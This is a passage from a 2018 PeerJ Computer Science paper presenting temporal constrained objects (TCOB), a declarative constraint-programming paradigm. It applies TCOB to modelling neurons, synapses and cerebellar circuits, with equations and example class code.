unwieldy, and hence it is critically important that the programming language used to program such models not exacerbate the problem with inadequate support. In this regard, imperative languages require more effort on the programmer, in providing the detailed data representation and algorithms, needed to solve a problem. This adds another layer of software complexity, especially when the problem to be modelled is a highly complex one. Declarative languages had their origins in 1960s and are useful in directly modelling a problem by stating the properties of solutions (Benhamou, Jussien & O’Sullivan, 2007). In constraint-based languages, programmers declaratively specify the relation between variables using constraints, and the task of solving/maintaining the constraints is the responsibility of the underlying constraint solvers (Freeman-Benson, Maloney & Borning, 1990). This approach provides the desired separation between the problem- specification phase and the problem-solving phase. In this paper, we present a compositional approach in constraint programming to model the structure and behaviour of complex biological systems using the concept of temporal constrained objects (Kannimoola et al., 2017). Temporal constrained objects are an extension of the paradigm of constrained objects which has been studied for over three decades (Borning, 1981; Leler, 1987; Horn, 1993; Tambay, 2003) and provide a declarative approach to data abstraction using the concepts of classes, hierarchies and aggregation found in object-oriented languages (Lago & Artalejo, 2001; Reiner & Zimmer, 2017). Constrained objects also provide a declarative approach to behavioural specification using constraints within the class (Jayaraman & Tambay, 2002). Constrained objects have been used previously to model cellular behaviour (Covert, Famili & Palsson, 2003) and metabolic pathways in cells (Pushpendran, 2006) in the context of biological systems. Although constraint satisfaction problems were introduced originally as a static framework, the paradigm of temporal constrained objects allows a modeller to solve a broader class of problems. In temporal constrained objects, constraint-solving is integrated within a time-based simulation regime and is Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 2/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ well-suited to problem domains that require ordinary differential equations or partial differential equations. Extensions to constraint programming frameworks, such as hybrid concurrent constraint programming (Gupta et al., 1995), have also proved to be useful in modelling constraint satisfaction problems with time-varying behaviours. Temporal constrained objects were successful in modelling highly dynamic systems such as vehicular networks (Kannimoola, Jayaraman & Achuthan, 2016) and firewalls (Kannimoola, Jayaraman & Achuthan, 2018). This paper applies similar modelling principles to neural microcircuits. In this paper, we demonstrate how the paradigm of temporal constrained objects can be applied for modelling the structure and behaviour of a complex biological system. Temporal constrained objects are appropriate for systems whose behaviour is governed by physical laws. The adaptive and dynamic nature of neural circuits demands efficient modelling strategies to incorporate structural compositions of the constituents at various translational levels—from ion channels to neurons to networks and behavioural systems. This paradigm is suitable to model neural systems since it focuses on a component- based modelling approach, with individual components governed by invariant principles. For example, neurons’ and synapses’ signalling mechanisms and its non-linear dynamics are represented by membrane voltage models constrained by current and voltage laws, and are also known to be constrained by neuronal anatomy and interconnection between neurons (Gutkin, Pinto & Ermentrout, 2003). While building neural networks, the aggregation of different neuronal circuit elements was automatically addressed using internal and interface constraints, without imposing the relations explicitly from outside. In this paper, the section ‘Background’ gives background about the programming language aspects of temporal constrained objects followed by the essential modelling principles of neural systems. Computational modelling of neural systems using temporal constrained objects is described in the section ‘Methods.’ We present a detailed case study of an implementation of neurons and the micro-circuitry of a rat cerebellum granular layer. The ‘Results’ section includes the results of modelling with temporal constrained objects as well as model validations and performance optimizations. The last two sections of the paper highlights the discussion followed by conclusions and remarks on future research directions. BACKGROUND Programming methodology Popular mainstream programming languages such as C, Java or Python require the programmer to specify detailed procedural instructions on how to solve a problem. In these languages, model specification and model implementation details are interwoven. In contrast, a declarative program specifies the expected result of a computation without explicitly detailing with the steps that must be performed to obtain that result. That is, declarative programming focuses more on what is to be computed, rather than how (Lloyd, 1994). In this paper we introduce a declarative programming paradigm called temporal constrained objects which integrates declarative constraints and constraint solving within the popular object-oriented paradigm for data abstraction. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 3/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ A constraint is a declarative specification of a relation between variables and does not explicitly specify a procedure or algorithm to enforce the relation. In constraint programming, the programmer models the system as a set of variables over well-defined domains and states the problem as a set of constraints on these variables. The constraint solver enumerates the possible values of the variables and checks whether these enumeration leads to a solution or not, by a process called constraint satisfaction. Constraints have been used in the past for formulating many combinatorial problems, including search problems in artificial intelligence and operational research. Object-oriented methods support component-based modelling where the whole system can be modelled incrementally using subsystems modelled previously. Although most mainstream languages that support object-oriented principles follow the imperative style of programming, object-oriented languages supporting declarative semantics have also been proposed (Lago & Artalejo, 2001). In temporal constrained objects the state of an object, i.e., the values of its attributes, is determined by a set of declarative constraints rather than by imperative procedures. Constraint-based and related systems Among the first in the area of constrained objects was ThingLab (Borning, 1981), a constraint-based simulation laboratory designed for interactive graphical simulations. The Kaleidoscope ’91 language (Lopez, Freeman-benson & Borning, 1994; Govindarajan, Jayaraman & Mantha, 1996) integrated constraints and object-oriented programming for interactive graphical user interfaces. Kaleidoscope added constraint hierarchies, multi-methods and constraint constructors, as well as user-defined constraints, which were simplified by the compiler to primitive constraints that could be solved by a primitive solver. Bertrand (Leler, 1987) was another language aimed at graphics applications, which was extended by Bruce Horn in his constrained object language Siri (Horn, 1991). This language used the notion of event pattern to declaratively specify state changes: by declaring what constraints held after the execution of a method, and also specifying which attributes may and may not change during the method execution. This constraint imperative language uses constraints to simulate imperative constructs such as updating, assignment and object identity. Inspired by Kaleidoscope, the language Babelsberg (Felgentreff et al., 2015) was developed that integrates constraints with object-oriented systems. A Ruby extension has been developed wherein programmers could add constraints to existing Ruby programs in incremental steps. Another extension has been made accessible from the Smalltalk language to enable the dynamic management of constraints, and a similar approach was followed by integrating constraint programming into Java language environment (Hon & Chun, 1999). Being early approaches, they provide a limited capability for expressing constraints. Modelica (Fritzson, 2004) is a constrained object language for modelling and simulation in the engineering context. It supports numerical constraints in an object-oriented framework and uses the MATLAB engine for constraint solving. Temporal constrained objects presented in this paper also employs similar modelling principles. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 4/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Existing neuroscience modelling platforms and tools Modelling and simulation techniques are extensively used as powerful complements to hypothesis testing for experimental studies related to biological and physiological systems. Simulation engines, computing environments and languages help building the computational model of the system from mathematical models. Currently, a neuroscience modeller has wide choice of tools that support better integration and model reuse across multiple simulators. While simulators such as NEURON, GENESIS and NEST employ domain-specific custom scripting languages to isolate model specification from simulation code, interoperable scripting was supported in simulators like MOOSE and PyNN (Goddard & Hood, 1998; Hines & Carnevale, 1997; Diesmann & Gewaltig, 2001; Ray & Bhalla, 2008; Davison et al., 2009). NEURON uses the interpreted language hoc for simulation control and a high-level language Neuron model description language (NMODL) for describing models, where each line of NMODL is translated into equivalent C statements. Both GENESIS and NESTuse high-level simulation languages to model neurons and synapses. While the simulation kernel of NEST is written in C++, Python commands are used to formulate and run neuron simulations with an extended code generation support using Cython (Zaytsev & Morrison, 2014). GENESIS also supports declarative modelling using a script-based language interpreter. These specialized tools are less verbose and can address different domain-specific modelling tasks in a computationally tractable way. All these simulators are software packages with several thousands of lines of code (LOC) and pose model exchange and interoperability problems. Although conceptual structure of modelling is commonly addressed in these simulators in a precise and concise manner, the simulation kernel of these tools uses object oriented and low level procedural code libraries. Since conversion of models from one simulator to another is a non-trivial task, simulator-independent language initiatives facilitated model sharing and model reuse across multiple simulators. PyNN and MOOSE uses high level Python libraries and APIs to support simulator independent interface for neuron modelling. Apart from these attempts, XML based model specification languages have helped reduce the implementation and platform dependent biases in the modelling process. As a model representation language, systems biology markup language provides a common format for describing models and supports interoperability among different tools in computational biology (Hucka et al., 2003). NeuroML (Gleeson et al., 2010) uses distinctive XML schemas to represent the morphology (MorphML), channel conductance (ChannelML) and network properties (NetworkML) of neural systems. NineML (Raikov, 2010) uses XML based abstract object models and enable quick prototyping of neuron, synapse and network models using parameters for model variables, state update rules and mathematical descriptions. Low entropy model specification also follows a similar approach and are more flexible in defining and translating models (Cannon et al., 2014). Even though the XML-based model description frameworks reduce external software dependencies, they do not provide any details on how to simulate the models. XML schemas supports model exchange and automated validation of Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 5/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ components but for better integration with existing simulators, these models should be easily translatable to multiple simulation platforms. The simulators need to either translate the models into equivalent internal models or use code generation through external or built in libraries. Spiking Neural Mark-up Language (SpineML), an extension of NineML uses simulator specific eXtensible Stylesheet Language Transformations (XSLT) templates to generate the simulation code (Richmond et al., 2014). The encoding of model details from XML format to the internal representation of the simulator completely depends on the data structure of the language selected for this translation. For example, mapping the NeuroML model description to the internal data structure of the simulators such as NEURON, GENESIS, PyNN or MOOSE is provided through simulator specific native scripts. Although the aforementioned simulators hide the implementation complexity from the modeller either through GUI or through modules and scripting, the software complexity of the simulator increases while satisfying these requirements. The computational architecture of the simulators handled the complexity and provided interfaces to the end user. Since temporal constrained objects are founded on constraints, a model’s concept space (model specification) and computational space (simulation control) can be represented with less implementation complexity. For modelling multiple levels as in enzyme or biochemical kinematics to neurons and neural circuits, a constraint-based solver that could handle several models of differential equation style mathematical abstractions was attempted in this study. Another motivation for our choice of the paradigm of temporal constrained objects is its amenability to parallelization. Modern programming paradigms are biased more towards many-core and multi-core programming. Current day simulation systems have become more reliant on high performance computing techniques. In computational neuroscience, a modelling study generally involves learning a domain specific language and then depending on the framework of this language to parallelize the programs. NEURON and GENESIS require modifications in the coding strategy to port the model to cluster computing environment while NEST almost transparently maps a model to multicore computers. Brian has little support for parallelization which limits its use for large scale systems (Goodman & Brette, 2008). The transition of a software to parallelization is easier with declarative paradigms (Darlington, Reeve & Wright, 1990). The advantage with parallel constraint programming is that no change is needed in the problem model for parallelization and the constraint framework handle the parallelization primitives. Parallel constraint programming frameworks exist (Rolf, 2011) which automatically parallelize the problem by dividing the task among several constraint solvers which perform parallel consistency and parallel search processes. Since consistency checking during constraint solving has similarities to single instruction multiple thread parallelism, GPU level parallelization of constraint propagation has been explored recently (Campeotto et al., 2014). Although beyond the limits of this paper, integrating parallelization with temporal constrained objects frameworks will benefit the neuroscience community to easily create abstract models which are automatically scalable. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 6/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Temporal constrained objects Constrained objects support object-oriented features, such as aggregation and inheritance, along with constraint-based specifications such as arithmetic equations and inequalities, quantified and conditional constraints. The programming language COB implements the constrained object paradigm (Jayaraman & Tambay, 2002). The COB language defines a set of classes, each of which contains a set of attributes, constraints, predicates and constructors. Every constrained object is an instance of some class whose outline is as follows. class_definition ::= [ abstract] class class id [ extends class id ] {body} body :: = [ attributes attributes] [ constraints constraints] [ predicates predicates ] [ constructors constructors] A class may optionally extend another class and the attributes, constraints, predicates and constructors are all optional. Constraints specify the relation between attributes of the typed classes. Constrained objects support both primitive and user-defined attributes, and constraints may be simple, conditional, quantified, or aggregate (also see Supplementary Material for a complete specification of the grammar of the language) (Tambay, 2003). Temporal constrained objects extend the basic paradigm of constrained objects to support time-varying properties of dynamic systems. Using temporal constrained objects, the structural aspects and the modularity of a system are modelled using encapsulation, inheritance and aggregation while the behavioural aspects are modelled through a rich set of constraints. The underlying computational engine performs logical inference and constraint satisfaction to enforce the behaviour automatically while each object is created. One of the most useful features of temporal constrained objects for modelling temporal (or dynamic) behaviour is the series variable, declared as: series type variable_name [initialization]; The series variable takes on an unbounded sequence of values over time, and temporal constraints are defined in terms of past and future values of the series variable. For every series variable v, the expression�v refers to the immediate previous value of v and v� to the next value. These operators can be juxtaposed (for example,��v and v��) to refer to successive values of v in the past or future. A series variable may also be initialized by explicitly assigning values at specific time points. An example of an alternating-current (AC) circuit illustrates the basic constructs of the language (Fig. 1). The series attributes, voltage (V) and current (I), in the abstract component class holds the sequence of values at different instance of time. The source class generates the input voltage for the circuit, which varies sinusoidal with time. The classes resistor and capacitor inherit voltage and current from the component class. The constraints in each class define the laws of circuit elements: the resistor class Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 7/31 http://dx.doi.org/10.7717/peerj-cs.159/supp-1 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ abstract class component{ attributes series real V, I; constraints V<1> = 0.0; I<1> = 0.0 } class source extends component{ constraints sin(Time, V); constructors source(){} } class resistor extends component{ attributes real R; constraints V = I * R; constructors resistor(R1) { R = R1; } } class capacitor extends component{ attributes real C; constraints I = C * (V -‘V); constructors capacitor(C1) { C = C1; } } class series_comp extends component{ attributes component [] SC; constraint forall C in SC: C.I = I; (sum X in SC: X.V) = V; constructors series_comp(A) { SC = A; } } class parallel_comp extends component{ attributes component[] PC; constraints forall X in PC: X.V = V; (sum X in PC: X.I) = I; constructors parallel_comp(B) {PC = B;} } class sample_circuit { attributes source AC;resistor R1,R2; capacitor C; series_comp S; parallel_comp P; component[]Ser; component[]Par; constructors sample_circuit(){ R1 = new resistor(10.0); R2 = new resistor(10.0); C = new capacitor(0.1); Ser[1] = R1;Ser[2] = C; S = new series_comp(Ser); AC = new source(); Par[1]=S; Par[2]=AC; Par[3]=R2; P = new parallel_comp(Par); }} Figure 1 Temporal constrained object representation of AC circuit. Full-size DOI: 10.7717/peerj-cs.159/fig-1 incorporates Ohm’s law for resistance (Eq. (1)); and the capacitor class incorporates Ampere’s law for capacitance (Eq. (2)). V ¼ IR (1) I ¼ C dv dt (2) The differential equation (Eq. (2)) is treated as difference equations in the capacitor class, i.e. the rate of change of voltage can be approximated by change in voltage in one unit of time. The parallel_comp and series_comp classes represent the two different Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 8/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-1 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ ways of combining the components of the AC circuit. (Of course, non-series parallel circuits can also be defined, but the example in Fig. 1 pertains only to series-parallel circuits.) The constraints describe the resultant voltage and current for both kinds of circuits. For example, in class parallel_comp, the quantified constraint forall enforces that the voltage across every component in the parallel circuit is the same and equal to the voltage across the parallel circuit; and, the summation constraint sums up the currents through each component of the parallel circuit and equates it to the current through the parallel circuit. The class sample_circuit builds a series component with a resistor and capacitor and a parallel component consisting of the series component, a sinusoidal voltage source and a single resistor. In order to understand the execution of a TCOB program, TCOB provides a built-in variable Time, which represents the current time and is automatically incremented by one unit to record the progression of time. The default initial value for Time is equal to one unless a different value is specified by the user. The user may adopt any other discrete granularity for time by multiplying with a suitable scaling factor, e.g. MyTime = 0.01 � Time. We use the example of an on-off controller (Fig. 2) to illustrate the basic concepts of conditional constraints in the TCOB. This is a simplified version of traffic light example from a previous paper (Kannimoola, Jayaraman & Achuthan (2016)). The variable C is declared using series keyword to model transitioning from on/off state in each time instance, specified by the conditional constraint symbol -->. When Time = 1, the value of C = on since this is the initial value of C as given in the constructor. At this time, the value of C�, i.e. value of C at Time = 2 is set as off based on the first constraint in the program. In a similar manner, the second constraint determines values for C for off-on transition. In this implementation, the TCOB programming environment consists of a compiler which translates the class definitions into equivalent predicates in SWI- Prolog which provides support for constraint-solving through its libraries. A more detailed description of the language is given in reference (Kannimoola et al., 2017). Electrical equivalent circuit of neurons A single neuron is often conceptualised using the biophysics of a neuronal membrane, represented by resistance-capacitance (RC) low-pass filtering properties wherein the class controller { attributes series string C; constraints C = on --> C` = off; C = off --> C` = on; constructor controller(){ C<1> = on;} } Figure 2 Simple controller using conditional constraints. Full-size DOI: 10.7717/peerj-cs.159/fig-2 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 9/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-2 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ lipid bi-layer of the neurons is modelled as capacitance (C), the voltage-gated ion channels as electrical conductance (g) and the electrical gradient as reversal potentials. Then, basic voltage and current laws (Ohm’s and Kirchhoff’s laws) are employed to calculate the voltage across the membrane of the neuron. The cell membrane acts as a diffusion barrier and an insulator to the movement of ions. The lipid bi-layer of the membrane accumulates charges over its surface where the intracellular and extracellular solutions act as the conducting plates separated by the non-conducting membrane. The capacitive current Ic , thus formed is Ic ¼ C dV dt (3) where C is the capacitance and V is voltage across the membrane. Ions flow into and out of the cell through ion channels. The flow of ions through these channels leads to resistive current flow into the neuron, which is represented using Ohm’s law: Iion ¼ VGion (4) where Gion is the conductance of ion across the membrane and Iion is the ionic current. The electromotive force acting over the ions as the battery of the circuit, when included, the ionic current can be represented as, Iion ¼ GionðV � EionÞ (5) Total current flowing across the membrane is the sum of the capacitive and ionic currents: ITotal ¼ Ic þ Iion (6) At steady state, membrane voltage remains constant, which means that the net current into the neuron plus the net current out of the neuron must equal zero. ITotal ¼ Ic þ Iion ¼ 0 (7) When an input current IExt is injected into the cell, it further charges the capacitor and the current leaks through the membrane. IExt ¼ C dV dt þ Iion (8) Larger number of open ion channels in the membrane decreases the resistance of the membrane due to increased ionic flow across the membrane. This results in an increase in conductance across the membrane. Ionic current flow through a neuron with Sodium, Potassium and Leak channels can thus be modelled as, IExt ¼ C dV dt þ GNaðV � ENaÞ þ GK ðV � EKÞ þ GLðV � ELÞ (9) Passive electrical properties persist in the neuron if the current is a sub threshold current or a hyperpolarizing current. Neurons are known to communicate to each other using stereotyped electrical signals called action potentials or spikes. The generation of action potential in the neuron can be explained by modelling the activation of ion channels. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 10/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Detailed conductance-based models like Hodgkin–Huxley (HH) model and simpler phenomenological models like Izhikevich model and Adaptive exponential integrate and fire model were used in this study to explain the spiking mechanisms of neurons. METHODS In this paper, we used temporal constrained objects to model the time-varying dynamics of a neural circuit as exhibited by the electrical activity of neurons and synapses. In modelling studies, elemental features of a neural system are abstracted into a conceptual model and are formalized into a mathematical form. A working embodiment of neural dynamics is created using computational models which is used to test and examine the modelled abstract. Chemical and electrical phenomena of neural systems were then simulated from mathematical representations (Fig. 3). Temporal constrained objects allowed a direct implementation of the circuit model of a neuronal system. Initial focus was on modelling the component-based structure of the neural system by identifying the components, their functions and parameters. The main constituent of the neural system—the neuron—was modelled in two different formulations: (1) using voltage functions which are continuous over a time evolution (as in a HH model, described in ‘Modelling neurons using continuous time HH mechanisms’); and (2) using voltage reset functions which show piece wise state changes (as in AdEx and Izhikevich models, described in ‘Reconstructing neurons using voltage Vin Vout Ic Ina Ik IL GNa GK GLC ENa EK EL Stim IExt dt dV CVVgVVgVVgI LLKKNaNaext )()()( Neuron C,Vm,Iext GNa,GK,GL,VNa,Vk,VL INa =M*M*M*H*GNa*(Vm-ENa); Ik = N*N*N*N* Gk * (Vm-Ek); Ileak= GL* (Vm)-EL; Iion= Ina + Ik+ IL; Vm = `Vm+ ( ( Iext -`Iion ) / C); Neuron RC Circuit Equivalent Model Mathematical Model Computational Model Figure 3 Computational modelling of neurons. It is a common practice to abstract a neuron as an RC circuit to describe the electrical properties of the neuron. Current flow in the neuron was mathematically modelled using this equivalent model. In the temporal constrained object approach, a neuron was represented as an abstract data type with attributes (state information) and constraints (rules of behaviour). Full-size DOI: 10.7717/peerj-cs.159/fig-3 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 11/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-3 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ reset models’). ‘Modelling synaptic dynamics’ presents modelling the synaptic interactions between neurons using continuous functions of time. In modelling neurons and synapses with temporal constrained objects, the biophysical mechanisms (abstracted as mathematical formulations in the models) were represented as constraints of the class. Continuous state changes of variables were represented using simple constraints while voltage reset functions were represented using conditional constraints. Once the fundamental components of a neural network were modelled, the interaction between these components in a network (‘Modelling neuronal interactions’ and ‘Modelling cerebellar microcircuits’) was incorporated. Biological fidelity of the models was tested to validate whether the model produces experimental outcomes. Modelling neurons using continuous time Hodgkin–Huxley mechanisms Hodgkin–Huxley equations (Hodgkin & Huxley, 1952) model biophysical characteristics of a neuronal membrane in detail. This model exhibits various neuronal behaviour by the calculation of ionic current in their mathematical notation. A set of first-order differential equations specify the dynamics of membrane voltages and ion channels of the neurons. According to this model, the ionic current flow in Eq. (9) has been rephrased as, IExt ¼ C dV dt þ gNaMaxm3hðV � ENaÞ þ gKMaxn4ðV � EKÞ þ GLðV � ELÞ (10a) where the ionic conductance was modelled as voltage dependent quantity with the flow of ions regulated by physical gates which are either in their open state or in closed state. In (10a), gNaMax and gKMax are the maximum conductance of Na + and K + ions, m and h are the probabilities of the fast and slow subunits of Na channel being open and closed states and n is the probability of the subunit of a K channel being open. Dynamical properties of these gating variables are also represented using differential Eqs. (10b–10d). dh dt ¼ ahð1 � hÞ � bhh (10b) dn dt ¼ anð1 � nÞ � bnn (10c) dm dt ¼ amð1 � mÞ � bmm; (10d) Hodgkin–Huxley model represents a system of four differential Eqs. (10a to 10d) which are coupled via voltage Vof the membrane. In the standard formulation of HH model, the rate constants a and b of the ionic gates are empirically determined as a function of membrane voltage V as am ¼ ð2:5 � 0:1VÞ e2:5 � 0:1V � 1 ; bm ¼ 4e �V 18 (10e) an ¼ ð0:1 � 0:01VÞ e1 � 0:1V � 1 ; bn ¼ 0:125e �V 80 (10f) Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 12/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ ah ¼ 0:07e� V 20; bh ¼ 1 e3 � 0:1V þ 1 (10g) In temporal constrained object implementation of the HH model, the properties of neurons, such as maximum channel conductance, reversal potential, or capacitance of the cell were represented as attributes of the class. Dynamically changing membrane voltage, the gating variables and the input current values were represented as series variables. The mathematical equations representing the relation between these variables were represented using quantified constraints and their initial values were represented using simple constraints (Fig. 4). Objects of the class can be created using creational constraints. The membrane potential in the HH model varies as a continuous function over time and the numerical integration require that the values should be specified over a time evolution. In traditional object-oriented languages, the behaviour of the model can be enforced using member functions in the class which are to be explicitly called during execution. In the temporal constrained object based formulation, the differential equations are converted into difference equations and the simulation evaluated the constraint at every time step. This facilitates a modular representation, where the model behaviour is implicitly enforced during constraint satisfaction. Reconstructing neurons using voltage reset models Detailed conductance-based models (as in ‘Modelling neurons using continuous time Hodgkin–Huxley mechanisms’) explain the behaviour of the neurons at a mechanistic level. Since such models have higher computational costs for complex circuits, we adopted two mathematical abstractions: Izhikevich model and Adaptive Exponential Integrate and Fire model (Izhikevich, 2003; Brette & Gerstner, 2005). class neuron { … constraints %The voltage equation (Vm-`Vm)=Dt*(Istim-((Gna*pow(`M,3)*`H*(`Vm-Ena))+(Gk* pow(`N,4)*(`Vm-Ek))+(Gleak*(`Vm-Eleak))))/C; %m,n,h dynamics (M-`M)=Dt*((1-`M)*((0.1*(-Vm + 25))/(pow(E,(-Vm+25)/10)-1)) - 4 * pow(E,(-Vm) / 18)*`M); (N-`N)=Dt*((1-`N)*(((0.1/10)*(-Vm+10))/(pow(E,(-Vm+10)/10)- 1)) - 0.125*pow(E,(-Vm)/80)*`N); (H-`H)=Dt*((1-H)*((0.7/10)*pow(E,(-Vm)/20))-(1/(pow(E,(Vm+30)/10) +1))*`H); Time < 2500 -->Istim = 5; %Applying input current Time >= 2500 -->Istim = 50; … } Figure 4 Representation of Hodgkin–Huxley model as a TCOB class. Full-size DOI: 10.7717/peerj-cs.159/fig-4 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 13/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-4 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ The Izhikevich model is expressed as: dV dt ¼ 0:04V2 þ 5v þ 140 � u þ I (11a) du dt ¼ a bV � uð Þ (11b) If u > 30mV; V ¼ C; u ¼ u þ d (11c) In the two-dimensional set of ordinary differential equations of the Izhikevich model (Eqs. (11a)–(11c)), V is the membrane potential, u is the recovery variable, a represents the time scale of this recovery variable, b represents the sensitivity of u towards sub-threshold fluctuations in V, C represents the after spike reset value of V, d represents the after spike reset value of u. This implementation of a canonical model includes a nonlinear term V 2 , and has been shown to reproduce multiple behaviours of neurons such as spiking, busting, adaptation, resonance and mixed mode behaviours. The Adaptive-Exponential Integrate and Fire (AdEx) model is expressed as: dV dt ¼ gL � V � ELð Þ þ gL � T � exp V�Vt T � � � Isyn � w C (12a) �w dw dt ¼ a � V � ELð Þ � w (12b) If V > 0mV; V ¼ Vr; w ¼ w þ b (12c) This model (Eqs. (12a)–(12c)) represents spiking dynamics (Eq. (12a)) and the adaptation in the firing rate of the neuron (Eq. (12b)) with V representing the membrane voltage, C is the membrane capacitance, gL is the leak conductance, EL is the resting potential, �T is the slope factor, Vt is the threshold potential, Vr is the reset potential, Isyn is the synaptic current, �w is the adaptation time constant, a is the level of sub-threshold adaptation and b represents spike triggered adaptation. The model implementation follows the dynamics of a RC circuit until V reaches Vt. The neuron is presumed to fire on crossing this threshold voltage and the downswing of the action potential is replaced by a reset of membrane potential V to a lower value, Vr. Since AdEx and Izhikevich models do not contain continuous-time equations, the membrane dynamics and its reset mechanisms in TCOB models were represented using conditional constraints. For example, Fig. 5 shows the class definition for an Izhikevich model. In the model, the membrane voltage does not change as a continuous function of time. The auxiliary reset of the membrane voltage v and the membrane recovery variable u, required a discontinuous change during constraint solving, the value being independent from the value of the variable in the previous time step. This change was controlled using the value of a series variable ‘flag,’ and using conditional constraints. It should be noted that this is not an imperative update of a state variable but rather the declarative specification of a value at a new point in time. Since the membrane potential Vm diverges towards infinity at a particular step and Vm need to be reset before Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 14/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ this step, another series variable Varray was used to store a finite maximum upswing value for Vm. AdEx type neurons were also modelled similarly (See Supplementary Material for the complete class definition). Modelling synaptic dynamics The neurotransmitter release and intake mechanisms of the pre- and post-synaptic neurons were modelled using synaptic conductance gsyn(t). The changes were represented as continuous-time equations which represented the fluctuations in synaptic conductance changes attributed to current flow (Destexhe, Mainen & Sejnowski, 1998). The synaptic currents were calculated as the difference between reversal potential and membrane potential (Eq. (13)). Isyn tð Þ ¼ gsyn tð Þ V � Esyn � � (13) where gsyn(t) = gmax . g(t), and gmax is the maximal conductance of the synapse, g(t) is the time course of synaptic channel conductance, Isyn(t) is the synaptic current, Esyn is the synaptic reversal potential and V is the membrane voltage. The time course of channel conductance g(t) was modelled using different mathematical formulations (Roth & van Rossum, 2009). For example, reconstructing exponential synapses biophysically included an instantaneous rise of gsyn(t) from 0 to gmax at time t0 (the time at which spike occurs) followed by an exponential term specifying the decay, with a time constant � (Eq. (14)). class neuron { attributes series real Vm, Varray, U; series int Flag; real A,B,C,D; real I,Dt; constraints Flag=1-->(Vm-`Vm)/Dt=((0.4/10)*`Vm*`Vm+5*`Vm+140-`U+I); Flag=1-->(U-`U)/Dt=A*(B*`Vm-`U); Vm > 30 --> (Vm` = C) ; Vm > 30 --> (U`= U + D) ; Vm > 30 --> Flag`=0; Vm <= 30 --> Flag`=1 ; Flag =1 --> Varray=Vm; Flag = 0 --> Varray = 30.0; constructors neuron() { A = 0.012; B = 0.2; C = -65.0; D = 4.0; Vm<1> = -60.0; U<1> = B* Vm<1>; Flag<2> = 1; I = 10.0, Dt=0.02; } } Figure 5 Izhikevich model represented as a TCOB class. Full-size DOI: 10.7717/peerj-cs.159/fig-5 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 15/31 http://dx.doi.org/10.7717/peerj-cs.159/supp-1 http://dx.doi.org/10.7717/peerj-cs.159/fig-5 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ gsyn tð Þ ¼ gmax:e� t�t0 �ð Þ (14) The exponential synapse model approximates synaptic dynamics with the rising phase shorter than the decay phase. A single-exponential function is a reliable approximation for several synapses where the channels instantaneously transit from closed to open states. Alpha synaptic models have been used for synapses with finite duration rising phases (Eq. (15)) while in double-exponential synapse model, both rise time and decay time of the synapses were modelled separately (Eqs. (16a)–(16c)). gsyn tð Þ ¼ gmax: t � t0 � :e 1� t�t0ð Þ � (15) gsyn tð Þ ¼ gmax : fnorm : e � t�t0 �decay � � � e� t�t0 �rise � � ! (16a) fnorm ¼ 1 e � tpeak�t0 �rise � � þ e� tpeak�t0 �decay � � ! : (16b) tpeak ¼ t0 þ �decay : �rise �decay � �rise : ln �decay �rise (16c) In temporal constrained object based implementation, synapses were also modelled using classes. Continuous conductance changes of the synapses were represented as constraints in each constituent class. Conditional constraints were used to represent the conductance changes before and after the stimulus onset. Synaptic currents were calculated by automatically evaluating the constraints in each class. Modelling neuronal interactions Behaviour of sub-cellular or cellular components in biological neural circuits is not entirely sufficient to understand network function, since the dynamics and complexity of the neural systems are known to be nonlinear (Koch & Segev, 1998) (also see Supplementary Material, Section 4). In the bottom-up modelling of brain circuits, challenges remain in assessing how the properties of individual neurons combine together to produce the emergent behaviour at the circuit and translational levels. In designing large circuit models, new rules of interaction may emerge from underlying principles. Here, TCOB like frameworks offer a natural way to express the interactions by identifying and implementing the constraints. A network of neurons was modelled in TCOB, where each neuron in the network was simulated with different number of excitatory and inhibitory synaptic inputs. Excitatory synapses were modelled using AMPA and NMDA synaptic dynamics where inhibitory synapses were modelled using GABA synaptic dynamics (McCormick, Wang & Huguenard, 1993). All neurons were modelled as complex objects, i.e. consisting of other constrained objects with its own internal attributes and constraints (Fig. 6). Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 16/31 http://dx.doi.org/10.7717/peerj-cs.159/supp-1 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ The class Neuron creates instances of the classes Adex_neuron to include the neuron model and the classes Ampa, Gaba and Nmda to model the synapses. Fig. 7 represents the TCOB model for UML class diagram in Fig. 6. The modelled neuron receives synaptic inputs through one AMPA, one NMDA and one GABA synapse. The total input current (Iin) to 